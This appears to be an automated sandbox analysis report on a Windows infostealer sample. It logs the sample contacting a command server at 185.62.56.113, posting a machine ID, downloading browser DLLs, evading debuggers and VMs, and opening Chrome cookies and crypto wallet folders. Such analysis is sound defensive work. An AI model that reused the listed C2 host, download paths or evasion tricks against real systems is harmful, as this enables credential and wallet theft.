0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: sqlite3.dll.0.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: https://mozilla.org0
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: recordHost: 185.62.56.113Content-Length: 95Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 61 6c 66 6f 6e 73 26 63 6f 6e 66 69 67 49 64 3d 64 66 36 33 65 37 39 32 63 39 31 35 32 32 37 39 39 33 34 61 61 33 37 31 34 64 62 63 30 36 63 31 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=df63e792c9152279934aa3714dbc06c1
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache

System Summary
barindex
PE file contains section with special chars
Source: VASkmEQ4iU.exe Static PE information: section name: .>\A
Uses 32bit PE files
Source: VASkmEQ4iU.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Sample file is different than original file name gathered from version info
Source: VASkmEQ4iU.exe, 00000000.00000002.480981180.00000000018EF000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamehelper.exe0 vs VASkmEQ4iU.exe
Source: VASkmEQ4iU.exe Binary or memory string: OriginalFilenamehelper.exe0 vs VASkmEQ4iU.exe
PE file contains strange resources
Source: VASkmEQ4iU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: VASkmEQ4iU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: VASkmEQ4iU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file contains more sections than normal
Source: sqlite3.dll.0.dr Static PE information: Number of sections : 18 > 10
Source: VASkmEQ4iU.exe ReversingLabs: Detection: 48%
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Mutant created: \Sessions\1\BaseNamedObjects\54881015517
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/12@0/1
Source: softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: VASkmEQ4iU.exe Static file information: File size 7389696 > 1048576
Source: VASkmEQ4iU.exe Static PE information: Raw size of .JFL is bigger than: 0x100000 < 0x704800
Source: VASkmEQ4iU.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.0.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.0.dr
Source: Binary string: nss3.pdb source: nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr
PE file contains sections with non-standard names
Source: VASkmEQ4iU.exe Static PE information: section name: .sI3
Source: VASkmEQ4iU.exe Static PE information: section name: .>\A
Source: VASkmEQ4iU.exe Static PE information: section name: .JFL
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.0.dr Static PE information: section name: /4
Source: sqlite3.dll.0.dr Static PE information: section name: /19
Source: sqlite3.dll.0.dr Static PE information: section name: /31
Source: sqlite3.dll.0.dr Static PE information: section name: /45
Source: sqlite3.dll.0.dr Static PE information: section name: /57
Source: sqlite3.dll.0.dr Static PE information: section name: /70
Source: sqlite3.dll.0.dr Static PE information: section name: /81
Source: sqlite3.dll.0.dr Static PE information: section name: /92
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .JFL
Drops PE files
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Memory written: PID: 2432 base: 9F0005 value: E9 FB 99 36 77 Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Memory written: PID: 2432 base: 77D59A00 value: E9 0A 66 C9 88 Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Memory written: PID: 2432 base: D80007 value: E9 7B 4C 01 77 Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Memory written: PID: 2432 base: 77D94C80 value: E9 8E B3 FE 88 Jump to behavior

Malware Analysis System Evasion
barindex
Tries to evade analysis by execution special instruction (VM detection)
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Special instruction interceptor: First address: 000000000187619E instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Special instruction interceptor: First address: 0000000001236577 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe RDTSC instruction interceptor: First address: 000000000189158B second address: 0000000001891596 instructions: 0x00000000 rdtsc 0x00000002 mov esi, dword ptr [esp+28h] 0x00000006 movzx bx, al 0x0000000a dec esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe RDTSC instruction interceptor: First address: 0000000000DF4968 second address: 0000000000DF4973 instructions: 0x00000000 rdtsc 0x00000002 mov esi, dword ptr [esp+28h] 0x00000006 movzx bx, al 0x0000000a dec esi 0x0000000b rdtsc
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe System information queried: FirmwareTableInformation Jump to behavior
Is looking for software installed on the system
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Thread information set: HideFromDebugger Jump to behavior
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe System information queried: KernelDebuggerInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Record Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.460242946.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.470300145.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.458303380.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.468368220.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446552049.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.466555483.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446585684.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451981881.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446651246.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446518544.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.481057037.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.454619131.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452125462.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446733215.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.455974232.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.469287857.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
